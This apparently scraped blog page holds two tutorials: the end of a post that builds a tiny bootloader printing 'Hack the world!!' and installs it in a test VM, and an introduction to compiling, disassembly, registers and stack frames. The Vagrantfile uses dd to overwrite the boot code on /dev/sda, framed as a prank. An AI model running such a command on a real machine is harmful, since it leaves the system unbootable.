Due to the \u0026lsquo;0x80\u0026rsquo; byte in the first records, the first partition is bootable. And the ID for that partition is 83. 
The second partition is not bootable, and its ID is 0x8e (Linux LVM), which matches what the file command reported. If you want, you can even calculate the size of each partition with the help of the other information present in these records: for example, the first partition has 0x00200000 = 2097152 sectors of 512 bytes each, which is 1 GiB.\nWe are now down to the first 446 bytes, which contain the bootloader. The bootloader is simply a piece of software that reads and loads other programs from the bootable partition. GRUB typically loads the second stage of itself from disk, however this is not a requirement. There are bootloaders that load the kernel directly into memory or, even better, some of them are full-fledged applications that just work. 3\nNote:- Although I won\u0026rsquo;t be discussing it today, you can use the ndisasm disassembler to disassemble the bootloader image. This will require some knowledge of the interrupts and memory management in the BIOS, which is outside the scope of this blog.\nThat settles it; now that we are aware of what is contained within an MBR, why don\u0026rsquo;t we attempt to construct one?\nCreating your own bootloader To start, we\u0026rsquo;ll make a simple raw binary file and put AA55 in it. Keep in mind that this is the magic number that belongs in an MBR.\ndw 0xAA55 Save this file as custom_bootloader.asm. After assembling it with nasm, the results should look like this.\n## Compile custom_bootloader.asm nasm -fbin custom_bootloader.asm -o custom_bootloader.bin ## Check the file type file rhel_magic_number custom_bootloader.bin ## Output # rhel_magic_number: ISO-8859 text, with no line terminators # custom_bootloader.bin: ISO-8859 text, with no line terminators ## Check hexdump hexdump -C custom_bootloader.bin ## Output # 00000000 55 aa |U.| # 00000002 We now have a 2 byte file containing the magic number. However, because the MBR is 512 bytes long, we must fill 510 more bytes. 
For the time being, let\u0026rsquo;s just fill it with zeros and see if it\u0026rsquo;s a valid MBR file.\ntimes 510 db 0 dw 0xAA55 The above code writes 510 zero bytes and then the two bytes of 0xAA55.\n## Compile custom_bootloader.asm nasm -fbin custom_bootloader.asm -o custom_bootloader.bin ## Check the file type file rhel_mbr custom_bootloader.bin ## Output # rhel_mbr: DOS/MBR boot sector # custom_bootloader.bin: DOS/MBR boot sector ## Check hexdump hexdump -C custom_bootloader.bin ## Output # 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| # * # 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa |..............U.| # 00000200 This is, as expected, a valid MBR file with no information about the partition table or the bootloader. Can we, however, use this to boot the system?\nLet\u0026rsquo;s make an attempt.\nI first tried without any MBR data to see what errors I would get when it fails.\nqemu-system-x86_64 And, as I was expecting, it said \u0026ldquo;no bootable device.\u0026rdquo;\nLet\u0026rsquo;s run the test again, but this time with the MBR file we made.\nIt did not give me the error this time, which implies that our MBR is accepted as bootable. Since it contains no bootloader code, it does nothing, but the previous error is gone.\nWe can now add instructions to our assembly file. However, we must make sure that we do not exceed the 512-byte limit, which means the amount of zero padding has to shrink as the code grows. NASM provides two special tokens for exactly this: $ evaluates to the current position and $$ to the start of the current section, so $-$$ is the number of bytes emitted so far.\ntimes 510-($-$$) db 0 ; $ - current addr; $$ - start addr dw 0xAA55 We can calculate the exact number of zeros required for padding using these tokens. 
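To make the padding arithmetic concrete, here is a minimal sketch of what the times 510-($-$$) line computes. The helper name build_boot_sector and the five placeholder NOP bytes are hypothetical, chosen only for illustration; they are not part of the original bootloader.

```python
SECTOR_SIZE = 512
BOOT_SIGNATURE = bytes([0x55, 0xAA])  # dw 0xAA55 is stored little-endian


def build_boot_sector(code):
    # Pad the code with zeros up to offset 510, then append the signature.
    padding = 510 - len(code)  # same arithmetic as 510-($-$$)
    if padding < 0:
        raise ValueError('code does not fit in 510 bytes')
    return code + bytes(padding) + BOOT_SIGNATURE


# Hypothetical 5-byte code stub (five NOPs), just to have something to pad.
sector = build_boot_sector(bytes([0x90] * 5))
print(len(sector), sector[-2:].hex())  # prints: 512 55aa
```

However many code bytes we add, the padding shrinks by the same amount, so the output stays at exactly 512 bytes.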
Let\u0026rsquo;s compile it and put it to the test.\nnasm -fbin custom_bootloader.asm -o custom_bootloader.bin qemu-system-x86_64 custom_bootloader.bin This produces the same results as before, and the output file size remains 512 bytes. Let\u0026rsquo;s add some more instructions to help us write some text on the screen.\nUnlike userspace and kernelspace programs, we do not have any helper functions that can take a string and automatically print it to the screen. We\u0026rsquo;ll have to tell the BIOS to do what we want here, and the only way I\u0026rsquo;m aware of is through interrupts. It is the same facility that operating systems and application programs use to access BIOS functions.\nHere is a list of common BIOS interrupts. Not all BIOSes (especially older ones) support all of these interrupts. The basic idea of using interrupts is that we place the proper values in specific registers and then trigger the interrupt. The interrupt routine then reads those registers and performs an action based on their values.\nAnyway, using the above table, I determined that we needed interrupt 10h (or 0x10) with function 00h in the AH register and mode 03h in the AL register, which together are simply the value 0x03 in AX. Consider it as invoking function 00h of interrupt 10h with the parameter 03h. This sets the video mode to 80x25 text.\nmov ax, 0x03 int 10h times 510-($-$$) db 0 dw 0xAA55 We can see that some initial bytes are written to the binary file after compiling and inspecting the hexdump\u0026hellip; 
And, thanks to $ and $$, the file size remains 512 bytes.\n# Compiling the binary nasm -fbin custom_bootloader.asm -o custom_bootloader.bin ## Checking hexdump hexdump -C custom_bootloader.bin ## Output # 00000000 b8 03 00 cd 10 00 00 00 00 00 00 00 00 00 00 00 |................| # 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| # * # 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa |..............U.| # 00000200 The leading bytes b8 03 00 cd 10 encode mov ax, 0x0003 followed by int 0x10. This switches the display to text mode, allowing me to print characters using the same interrupt 10h but with a different value in the ah register (0Eh, teletype output).\nmov ax, 0x03 int 10h mov ah, 0xE mov al, \u0026#39;H\u0026#39; int 0x10 mov al, \u0026#39;E\u0026#39; int 0x10 mov al, \u0026#39;Y\u0026#39; int 0x10 times 510-($-$$) db 0 dw 0xAA55 When we compile and run this with qemu, we get the message \u0026ldquo;HEY\u0026rdquo; printed on the screen.\nNow that we know how to write characters on the screen, let\u0026rsquo;s make a string and loop through it until the end, printing each character on the screen one by one using the same interrupt combination.\n; Setup TTY mode mov ax, 0x03 int 10h mov si, msg ; si register now points to msg mov ah, 0Eh ; Use write function from 10h interrupt .loop: lodsb ; load first char from msg and point to next char or al, al ; Check if end of string jz halt ; if end of string, jump to halt int 10h ; else, print char via interrupt jmp .loop ; loop halt: msg: db \u0026#34;Hack the world\u0026#34;, 0 times 510-($-$$) db 0 dw 0xAA55 Unfortunately, testing the above code does not produce the desired result; it prints garbage instead.\nFurther investigation revealed that the addresses in our code do not match where the bootloader actually sits in memory: the assembler assumed the code starts at address 0, while the BIOS loads it elsewhere. This led me down another rabbit hole, this time about what the computer\u0026rsquo;s physical memory looks like when the BIOS jumps to my bootloader code. 
Here is a dedicated page on this topic which covers it in a lot of detail.\nFor us, it is enough to add a couple of directives that tell the assembler where the code will live in memory. Finally, our code will look like this.\nbits 16 ; BIOS works in 16 bit mode org 0x7c00 ; MBR is loaded at 0x7c00 memory location mov ax, 0x03 int 10h mov si, msg mov ah, 0Eh .loop: lodsb or al, al jz halt int 10h jmp .loop halt: cli ; disable further interrupts hlt ; halt msg: db \u0026#34;Hack the world!!\u0026#34;, 0 times 510-($-$$) db 0 dw 0xAA55 This time we get the desired result after compiling and testing the above. We successfully created a bootloader that prints a message on the screen.\nConclusions We know that an MBR sector consists of 3 parts:\nbootloader (446 bytes) partition table (64 bytes) magic number (2 bytes) And each component can be extracted separately and treated as a regular binary file. This means that we can back up just the partition table if necessary. Alternatively, we can replace the bootloader code with other code without affecting the partition table. (Obviously for fun; like a friendly joke, nothing malicious) 😈 😈\nWe know our \u0026ldquo;Hack the World!!\u0026rdquo; code above does not use all 510 bytes, so why not shrink it a little to fit in 446 bytes? 
This way we can protect the original partition table.\nbits 16 org 0x7c00 mov ax, 0x03 int 10h mov si, msg mov ah, 0Eh .loop: lodsb or al, al jz halt int 10h jmp .loop halt: cli hlt msg: db \u0026#34;Hack the world!!\u0026#34;, 0 times 446-($-$$) db 0 ; Just change 510 to 446 :) dw 0xAA55 This will generate the raw data file containing the bootloader program, which we can quickly test in a virtual machine.\nVagrant.configure(\u0026#34;2\u0026#34;) do |config| config.vm.box = \u0026#34;archlinux/archlinux\u0026#34; config.vm.box_check_update = true config.vm.provider \u0026#34;virtualbox\u0026#34; do |vb| vb.gui = true vb.memory = \u0026#34;512\u0026#34; end config.vm.provision \u0026#34;shell\u0026#34;, inline: \u0026lt;\u0026lt;-SHELL # Backup the original bootloader dd \\ if=/dev/sda \\ of=/vagrant/backedup_bootloader.bin \\ bs=1 \\ count=446 # Copy the fun bootloader to first 446 bytes of sda dd \\ if=/vagrant/custom_bootloader.bin \\ of=/dev/sda \\ bs=1 \\ count=446 # Reboot the system to see the effect reboot SHELL end The Vagrantfile above will launch a quick test VM. We just need to sit back and relax.\nAfter a successful boot and reboot, it displayed the expected message.\nhttps://en.wikipedia.org/wiki/BIOS\nhttps://www.man7.org/linux/man-pages/man1/dd.1.html\nhttps://forum.osdev.org/viewtopic.php?f=2\u0026amp;t=18763\n","permalink":"https://ayedaemon.github.io/post/2022/09/fun-with-mbr/","summary":"Malware has been used numerous times by attackers to destroy a computer\u0026rsquo;s Master Boot Record, rendering it inoperable. Once the MBR is erased, the machine is unable to load the operating system. There is no easy way to rewrite the Master Boot Record into place without an operating system, and the machine becomes completely useless and unrecoverable. 
In addition, many ransomware families infect the master boot record by overwriting it with malicious code.","title":"Fun with Master Boot Record"},{"content":"Steps to generate a binary When we write a program in a language like C, it is not the C source code that actually gets executed. The C code passes through several steps, and a binary file is finally generated from it. This binary file is what gets executed on a computer.\nThere are several steps through which C code is converted into a binary file:-\nPre-processing Compilation Assembly Linking Let\u0026rsquo;s follow these steps one by one to understand what they do to the C code and how a binary is generated from it. To get started, we need a C program that we want to convert into a binary.\n//file: hello_world.c #include \u0026lt;stdio.h\u0026gt; // main function int main() { printf(\u0026#34;Hello World\u0026#34;); // Print \u0026#34;Hello World\u0026#34; return 5; // Return with 5 return value } If you are even a bit familiar with C programs, you will understand that the above program defines a main() function, calls printf() to print the string Hello World, and finally returns the value 5.\nPre-processing Let\u0026rsquo;s see what we get after pre-processing this C program. With gcc this can be done with the command below.\ngcc -E hello_world.c -o hello_world.i This takes the provided C program and does many things to it, a few of which are mentioned below.\nRemoves the comments. Replaces the #include statements with the actual file content. For example, #include\u0026lt;stdio.h\u0026gt; is replaced with the contents of stdio.h. Compilation After pre-processing, the generated file is used to generate assembly instructions. These instructions are microprocessor (or CPU) specific. 
A microprocessor is the computer component that handles all kinds of conditional logic, arithmetic calculations and other logical activities.\nYou might have heard about a few microprocessor families like Intel x86 and ARM, but there are many more. Unfortunately, each family has its own instruction set.\nWe can convert our pre-processed code file to equivalent assembly code using gcc.\ngcc -S hello_world.i -o hello_world.s This will provide us with a hello_world.s file.\nfile hello_world.s # hello_world.s: assembler source, ASCII text This step produces assembly language source code for my microprocessor family (Intel x86-64). If you want to generate assembly code for other families (also called architectures), you might want to look into cross-compilers.\nThis assembly code is a human-readable form of the instructions that the processor will eventually execute. If we look into this file, we will be able to see the assembly code for the C program we wrote.\ncat hello_world.s Output:\n.file \u0026#34;hello_world.c\u0026#34; .text .section .rodata .LC0: .string \u0026#34;Hello World\u0026#34; .text .globl main .type main, @function main: .LFB0: .cfi_startproc pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 leaq .LC0(%rip), %rax movq %rax, %rdi movl $0, %eax call printf@PLT movl $5, %eax popq %rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident \u0026#34;GCC: (GNU) 12.1.1 20220730\u0026#34; .section .note.GNU-stack,\u0026#34;\u0026#34;,@progbits This is what the intermediate code in assembly language looks like. We\u0026rsquo;ll talk more about this in later sections. 
For now, let\u0026rsquo;s move forward and see how a binary file is created from this assembly code.\nAssembling into binary We can convert the assembly code to a binary file using gcc with the command below:-\ngcc -c hello_world.s -o hello_world.o This will generate the binary object file, which can be analyzed with tools like objdump and hexdump. This object file contains the machine code for the source we wrote, but it is not yet something we can run from the terminal with ./hello_world.o; for that we need one more step.\nLinking the binary This last step takes your object file (the .o file from the last step) and produces either a library or an executable file. It replaces the references to undefined symbols with the correct addresses. There is a lot more going on here, so to keep it short and simple: this step creates your executable from your object file by linking it with other required files, like the standard libraries. Ultimately, this generates the executable or library which we can use or distribute.\nUsing gcc, we can achieve this with:-\n## -v option is just to print the verbose output. gcc -v hello_world.o -o hello_world.out After all these steps, we have our binary file and all the intermediate files.\nfile * # hello_world.c: C source, ASCII text # hello_world.i: C source, ASCII text # hello_world.o: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped # hello_world.out: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c6293fa95c56250957a3babeecd8d18fc463e7cf, for GNU/Linux 4.4.0, with debug_info, not stripped # hello_world.s: assembler source, ASCII text To summarize, the C program we write goes through various steps to generate an executable binary file. And this binary file is what executes on our machine\u0026hellip; or in other words, this binary tells our processor what job we want it to do.\nReverse Engineering?? 
Reverse Engineering is the process of figuring out how something works. This process can be applied to almost anything, including computer programs.\nIf we are given a compiled, assembled and linked binary file, we can apply reverse engineering to understand what that program does. This skill is useful for many tasks like writing keygens and patches, understanding low-level vulnerabilities, profiling applications, malware analysis, etc.\nSince assembly language is the closest human-readable representation of any binary, we need a good understanding of it to do reverse engineering well. Obviously this varies with the compiler used and the architecture for which the binary was compiled\u0026hellip; So we might need to learn how different compilers generate assembly code for different microprocessor families.\nMost of the time we are given the binary file of a program instead of its source code, so we only have the assembly representation to work from. However, there are tools like ghidra that take the compiled code and give us a view of what the C code for that binary might look like. This is called decompilation.\nbinary \u0026lt;\u0026ndash;\u0026gt; assembly (assembly \u0026lt;\u0026ndash;\u0026gt; disassembly) At this point, we know how a C program gets converted to a binary file by the complete compilation process. Let us understand more about the relation between a binary file and its assembly code.\nWe have already seen that the intermediate assembly code can be converted to a binary file by an assembler (in our case, the assembler stage of gcc). 
The inverse can be done via disassemblers.\nA disassembler takes the binary file as input, reads its contents and maps the binary values to their respective assembly instructions.\n[Diagram: binary values, byte pairs, assembly code]\nThere are many disassemblers we can use like:-\nobjdump ghidra radare2 gdb hopper and many more Let\u0026rsquo;s try to disassemble our hello_world.out binary and see what it provides us.\nobjdump --disassemble hello_world.out | wc -l # 122 Objdump provides a lot of output for the disassembly of a simple \u0026ldquo;Hello World\u0026rdquo; program. This is because we linked the hello_world.o file to obtain the hello_world.out file. This new file contains a lot of extra code that lets it run on the machine with the ./hello_world.out command.\nIf we check the unlinked version of our binary, we\u0026rsquo;ll get a lot less output.\nobjdump --disassemble hello_world.o | wc -l # 16 ## Looking at the disassembled binary objdump --disassemble hello_world.o # 0000000000000000 \u0026lt;main\u0026gt;: # 0: 55 push %rbp # 1: 48 89 e5 mov %rsp,%rbp # 4: 48 8d 05 00 00 00 00 lea 0x0(%rip),%rax # b \u0026lt;main+0xb\u0026gt; # b: 48 89 c7 mov %rax,%rdi # e: b8 00 00 00 00 mov $0x0,%eax # 13: e8 00 00 00 00 call 18 \u0026lt;main+0x18\u0026gt; # 18: b8 05 00 00 00 mov $0x5,%eax # 1d: 5d pop %rbp # 1e: c3 ret The same results can be obtained from our linked binary, if we only ask objdump to disassemble main() function.\nobjdump --disassemble=main hello_world.out # 0000000000001139 \u0026lt;main\u0026gt;: # 1139: 55 push %rbp # 113a: 48 89 e5 mov %rsp,%rbp # 113d: 48 8d 05 c0 0e 00 00 lea 0xec0(%rip),%rax # 2004 \u0026lt;_IO_stdin_used+0x4\u0026gt; # 1144: 48 89 c7 mov %rax,%rdi # 1147: b8 00 00 00 00 mov $0x0,%eax # 114c: e8 df fe ff ff call 1030 \u0026lt;printf@plt\u0026gt; # 1151: b8 05 00 00 00 mov $0x5,%eax # 1156: 5d pop %rbp # 1157: c3 ret Of course, a few things are different, like the numbers in the first column (these numbers 
are offset values; we don\u0026rsquo;t need to understand them right now). But if we focus only on the second and third columns, which hold the raw instruction bytes in hexadecimal and their assembly representation respectively, the two listings are nearly identical.\nThe main difference between a .o and a .out file is that the .o file is not yet linked to any platform-dependent libraries. Here is a good stackoverflow thread about the same topic.\nThe assembly code has a syntax structure, which is a good place to start understanding how it works. Each line in the above output contains 1 assembly instruction, and every instruction is composed of either 1, 2 or 3 keywords. These can be represented in the syntax below.\n## Syntax by Intel | Keyword1 | Keyword2 | Keyword3 | |--------------|------------|------------| | OPCODE | destination| source | or ## Syntax by AT\u0026amp;T | Keyword1 | Keyword2 | Keyword3 | |--------------|-----------|-------------| | OPCODE | source | destination | There are a few other differences between these 2 syntaxes, but they do not change anything in the logic or working of the binary. You can think of them as different representations of the same thing. Read more from here: AT\u0026amp;T Syntax versus Intel Syntax and here: StackOverflow - NASM (Intel) versus AT\u0026amp;T Syntax: what are the advantages?. 
I prefer to use Intel syntax and will be using that throughout this article.\nBy default, objdump provides AT\u0026amp;T syntax but you can explicitly ask it to provide the Intel syntax using the --disassembler-options=intel flag.\nobjdump --disassemble=main --disassembler-options=intel hello_world.out output\n0000000000001139 \u0026lt;main\u0026gt;: 1139: 55 push rbp 113a: 48 89 e5 mov rbp,rsp 113d: 48 8d 05 c0 0e 00 00 lea rax,[rip+0xec0] # 2004 \u0026lt;_IO_stdin_used+0x4\u0026gt; 1144: 48 89 c7 mov rdi,rax 1147: b8 00 00 00 00 mov eax,0x0 114c: e8 df fe ff ff call 1030 \u0026lt;printf@plt\u0026gt; 1151: b8 05 00 00 00 mov eax,0x5 1156: 5d pop rbp 1157: c3 ret The purpose of higher level languages like C is that we don\u0026rsquo;t have to deal with all this assembly code for everything. To use assembly effectively, there are a lot of details we need to understand and keep in mind continuously. With higher level languages, we can write the code more easily and then pass it to a compiler, which generates the assembly code and binary file for us to use\u0026hellip;\nHeap, Stack and Registers Every C process (not program) uses many things to work; 4 of them are the Heap, the Stack, Registers and Instructions. We have just covered instructions in the previous section, so now let us start with the others.\nThe heap is a memory allocation strategy used for dynamic storage allocation, i.e., allocating memory at run time. The actual working of the heap is a bit complex and is out of scope for this article. For now, keep in mind that any call to malloc, calloc or a similar function allocates memory on the heap. All objects which have dynamic storage duration are suitable for the heap.\nRegisters are small storage areas in the processor, which are used by instructions to hold values. They can store anything up to their size limit. Different architectures have different register sizes, ranging from 8-bit to 64-bit registers. 
There are even 128, 256, and 512-bit registers. Here is a stackoverflow thread for the same.\nBack in the early days (1972), Intel added a few 8-bit general purpose registers to their microprocessors\u0026hellip; general purpose registers are used for general purposes like storing return values, temporary calculation results, etc.\n[Diagram: four 8-bit general purpose registers named A, B, C and D]\nLater these 8-bit registers were widened to 16 bits\u0026hellip; Each 16-bit register was logically partitioned into two 8-bit registers, maybe to keep supporting older software that needed 8-bit registers to work. Anyway, the new registers looked something like this\u0026hellip;\n[Diagram: the 16-bit registers AX, BX, CX and DX, each of which can also be viewed as two 8-bit halves: AH/AL, BH/BL, CH/CL and DH/DL]\nThese 16-bit registers were partitioned into 2 sections, the high byte (H) and the low byte (L).\nFollowing that, a few years later, the 16-bit registers were extended to support 32-bit software, adding an E prefix. 
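The way the narrower names alias the low bits of a wider register can be mimicked with plain bit masks. This is just an illustrative sketch; the helper name split_eax is made up for the example.

```python
def split_eax(eax):
    # Return the AX, AH and AL views of a 32-bit EAX value.
    eax &= 0xFFFFFFFF          # keep only 32 bits
    ax = eax & 0xFFFF          # low 16 bits of EAX
    ah = (ax >> 8) & 0xFF      # high byte of AX
    al = ax & 0xFF             # low byte of AX
    return ax, ah, al


ax, ah, al = split_eax(0x11223344)
print(hex(ax), hex(ah), hex(al))  # prints: 0x3344 0x33 0x44
```

Note that the upper 16 bits of EAX (0x1122 here) have no register name of their own.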
After that, an R prefix was added for the 64-bit registers.\nThe diagram below shows how these registers are mapped to support previous designs/architectures.\n[Diagram: RAX (64-bit) contains EAX (32-bit) in its lower half, while its upper 32-bit section has no name. EAX contains AX (16-bit) in its lower half, and AX is split into AH and AL (8 bits each).]\nNowadays, 64-bit and 32-bit systems are very common and can be easily found. Knowing this mapping is very important when reverse engineering arithmetic and logic calculations from disassembly.\nApart from these general purpose registers, there are 3 special purpose registers - ebp, esp and eip. ebp and esp point to memory locations on the stack (another kind of memory area used by processes), while eip points to the next instruction to execute. There are times when we need to store the values of these registers on the stack. We\u0026rsquo;ll see some of those cases as we go further.\nThe stack is a data structure in memory which supports 2 operations - push and pop. 
Push adds an element to the top of the stack and pop removes the top element of the stack.\nEach element on the stack has an address which can be used to refer to any location on the stack. The stack is upside down, meaning that it grows towards the lower memory addresses.\n[Diagram: stack frames 1, 2 and 3 for Func1, Func2 and Func3, laid out from high addresses to low addresses; the stack grows towards the lower addresses]\nWhenever a function is called it creates its stack frame, and all the local variables for that function are stored in that function\u0026rsquo;s stack frame. This introduces the need to track 2 values for the current stack frame.\nWhat is the base of the stack frame? Where did the stack frame start? What is the topmost location of the stack frame? How much has the stack grown? 
These are tracked by 2 special purpose registers - rbp (64-bit base pointer register) and rsp (64-bit stack pointer register) respectively.\n[Diagram: stack frames 1 to 4 for Func1 to Func4, from high addresses to low addresses; rbp points to the base of the newest frame and rsp to its top]\nLet\u0026rsquo;s take another example to understand how this would work for a regular C program.\n#include \u0026lt;stdio.h\u0026gt; int func2(int a, int b, int c, int d, int e, int f, int g, int h) { int z = 0; int sum = a + b + c + d + e + f + g + h; char ch = \u0026#39;A\u0026#39;; return sum; } void func1() { int x = func2(1, 2, 3, 4, 5, 6, 7, 8); } int main(){ func1(); } This is roughly what the execution flow of the above program will look like\u0026hellip;\nmain() calls func1() without any arguments. func1() allocates some memory for int x and then calls func2() with eight integer arguments. func2() creates some local variables, both with hardcoded values and from the passed arguments, and then returns a value back to func1(). Finally the control is passed back to main(). If you visualise the stack just before the main() function is loaded on it, the stack will be something like this:-\n[Diagram: before main starts executing, the stack holds only the stack frame of the previous function, bounded by rbp and rsp]\nAfter this, the main() function is set up on the stack; 
this will cause the return address to be pushed on to the stack, which will be used once the main() function has completed its execution\u0026hellip; This is the address which tells the processor where to go back to once main() returns. Visually the stack will look something like this.\n[Diagram: the stack frame of the previous function, followed by the return address; rbp and rsp have both moved]\nNotice that rbp and rsp have also moved\u0026hellip; rsp moves to wherever the top of the stack is, and rbp points to the base of the current stack frame. This is what the loading of a function looks like. This is called the Prologue.\nNow the rip (64-bit instruction pointer) will point to the main() function\u0026rsquo;s code block and will execute those instructions one by one. This will push more values to the stack as required, but not everything needs to be added to the stack. We only push the values which we need to save for later use, and pop them when they are no longer required.\nLooking at the disassembly of the main() function will help us understand what gets added to the stack.\n0000000000001153 \u0026lt;main\u0026gt;: 1153: 55 push rbp 1154: 48 89 e5 mov rbp,rsp 1157: b8 00 00 00 00 mov eax,0x0 115c: e8 da ff ff ff call 113b \u0026lt;func1\u0026gt; 1161: b8 00 00 00 00 mov eax,0x0 1166: 5d pop rbp 1167: c3 ret Here, the first 2 instructions make up what we call the Prologue. It pushes the previous rbp to the stack (saving the caller\u0026rsquo;s base pointer) and then updates rbp with the current rsp (stack pointer) value.\nThen it moves 0x0 to the eax register. This happens because func1() is declared without a prototype, so gcc treats the call like a variadic one, and the System V AMD64 ABI then expects al to hold the number of vector registers used for arguments (zero here). Remember:- eax is another general purpose register that is used by called functions to save the return value. 
This can then be read by the caller function to know what that function returned.\nAfter resetting eax, it calls the func1() function\u0026hellip; this will transfer the control to func1().\n000000000000116a \u0026lt;func1\u0026gt;: 116a: 55 push rbp 116b: 48 89 e5 mov rbp,rsp 116e: 48 83 ec 10 sub rsp,0x10 1172: 6a 08 push 0x8 1174: 6a 07 push 0x7 1176: 41 b9 06 00 00 00 mov r9d,0x6 117c: 41 b8 05 00 00 00 mov r8d,0x5 1182: b9 04 00 00 00 mov ecx,0x4 1187: ba 03 00 00 00 mov edx,0x3 118c: be 02 00 00 00 mov esi,0x2 1191: bf 01 00 00 00 mov edi,0x1 1196: e8 7e ff ff ff call 1119 \u0026lt;func2\u0026gt; 119b: 48 83 c4 10 add rsp,0x10 119f: 89 45 fc mov DWORD PTR [rbp-0x4],eax 11a2: 90 nop 11a3: c9 leave 11a4: c3 ret func1() will then store the previous (main function\u0026rsquo;s) rbp value on the stack and update the base pointer with the stack pointer\u0026rsquo;s value. At this point our stack will look something like below:-\n[Diagram: the stack holds the return address of the previous function and the return address of main; rbp and rsp both point at the top]\nNow after the prologue instructions, the instruction pointer (rip) is at instruction 116e \u0026ndash;\u0026gt; sub rsp,0x10. This subtracts 0x10 from rsp, which widens the gap between rbp and rsp and so reserves some memory space in the stack frame. Nothing is written to the stack yet; the subtraction merely sets the space aside.\n[Diagram: the same stack from high addresses to low addresses, now with a 0x10-byte gap between rbp and rsp]\nThis allocated space is now used to hold the local variables of func1()\u0026hellip; For our case, that will be int x. 
Integers use only 4 bytes of space for themselves, but gcc by default keeps the stack aligned to 16 bytes, so space is reserved in 16-byte chunks. That is the reason for rsp to move 0x10 (16) bytes downwards. We can change this behaviour by explicitly passing the -mpreferred-stack-boundary=n flag to gcc. Read more about this here: Stack allocation, padding, and alignment\nAfter the memory is allocated on the stack for local variables, it is time to call func2 with all the arguments. According to the System V AMD64 calling convention used on x86-64 Linux, whenever a function is called, its arguments are first loaded into predefined registers in a specific positional order. But only the first 6 integer arguments are passed in registers; the rest are pushed to the stack.\nFor this case, there are 8 arguments in total\u0026hellip; 6 of them will be stored in the general purpose registers and the remaining 2 will be pushed to the stack.\n[Diagram: from high addresses to low addresses, the stack holds the return address of the previous function, the return address of main, the 0x10-byte local area of func1, and then the pushed arguments 0x8 and 0x7; rbp marks the base of the func1 frame and rsp its top]\nWhen more values are pushed to the stack, the stack pointer moves further towards lower addresses and the stack frame grows. Here these 2 values are added to the stack and then the function is called\u0026hellip; this will cause the return address to be pushed to the stack too (so that control can come back to this location).\n[Diagram: the same stack with the return address of func1 pushed below 0x8 and 0x7]\nAfter this, the instruction pointer starts pointing at the instructions of the func2 function.\n0000000000001119 \u0026lt;func2\u0026gt;: 1119: 55 push rbp 111a: 48 89 e5 mov rbp,rsp 111d: 89 7d ec mov DWORD PTR [rbp-0x14],edi 1120: 89 75 e8 mov DWORD PTR [rbp-0x18],esi 1123: 89 55 e4 mov DWORD PTR [rbp-0x1c],edx 1126: 89 4d e0 mov DWORD PTR [rbp-0x20],ecx 1129: 44 89 45 dc mov DWORD PTR [rbp-0x24],r8d 112d: 44 89 4d d8 mov DWORD PTR [rbp-0x28],r9d 1131: c7 45 f8 00 00 00 00 mov DWORD PTR [rbp-0x8],0x0 1138: 8b 55 ec mov edx,DWORD PTR [rbp-0x14] 113b: 8b 45 e8 mov eax,DWORD PTR [rbp-0x18] 113e: 01 c2 add edx,eax 1140: 8b 45 e4 mov eax,DWORD PTR [rbp-0x1c] 1143: 01 c2 add edx,eax 1145: 8b 45 e0 mov eax,DWORD PTR [rbp-0x20] 1148: 01 c2 add edx,eax 114a: 8b 45 dc mov eax,DWORD PTR [rbp-0x24] 114d: 01 c2 add edx,eax 114f: 8b 45 d8 mov eax,DWORD PTR [rbp-0x28] 1152: 01 c2 add edx,eax 1154: 8b 45 10 mov eax,DWORD PTR [rbp+0x10] 1157: 01 c2 add edx,eax 1159: 8b 45 18 mov eax,DWORD PTR [rbp+0x18] 115c: 01 d0 add eax,edx 115e: 89 45 fc mov DWORD PTR [rbp-0x4],eax 1161: c6 45 f7 41 mov BYTE PTR [rbp-0x9],0x41 1165: 8b 45 fc mov eax,DWORD PTR [rbp-0x4] 1168: 5d pop rbp 1169: c3 ret This is the biggest function we have seen so far\u0026hellip; We already know the prologue, which covers the first 2 instructions of this assembly code. Let\u0026rsquo;s read and try to understand the remaining instructions. Before starting that, let\u0026rsquo;s see what our stack looks like after this function\u0026rsquo;s prologue.\n[Diagram: the same stack after the prologue of func2; rsp and rbp now both point just below the return address of func1, and the 0x10-byte local area of func1 lies above the pushed arguments]\nIt is a good idea to visualize how the stack will look after this function has been loaded and all the required memory is allocated to it.\n[Diagram: the stack frame of func2 below rbp. Local variables sit at rbp-0x04, rbp-0x08 and rbp-0x09, and the copies of the register-passed arguments occupy rbp-0x14 down to rbp-0x28.]\nNow we can easily see which variables are stored where on the stack. The positional arguments that were passed in registers are copied to the stack below the local variables.\n111d: 89 7d ec mov DWORD PTR [rbp-0x14],edi ; 0x1 1120: 89 75 e8 mov DWORD PTR [rbp-0x18],esi ; 0x2 1123: 89 55 e4 mov DWORD PTR [rbp-0x1c],edx ; 0x3 1126: 89 4d e0 mov DWORD PTR [rbp-0x20],ecx ; 0x4 1129: 44 89 45 dc mov DWORD PTR [rbp-0x24],r8d ; 0x5 112d: 44 89 4d d8 mov DWORD PTR [rbp-0x28],r9d ; 0x6 These locations are contiguous, with 4 bytes of memory for each integer. gcc can pack them this tightly because it knows the size of each passed argument.\n1131: c7 45 f8 00 00 00 00 mov DWORD PTR [rbp-0x8],0x0 Then, 0x0 is stored to rbp-0x8. This will be one of our local variables. 
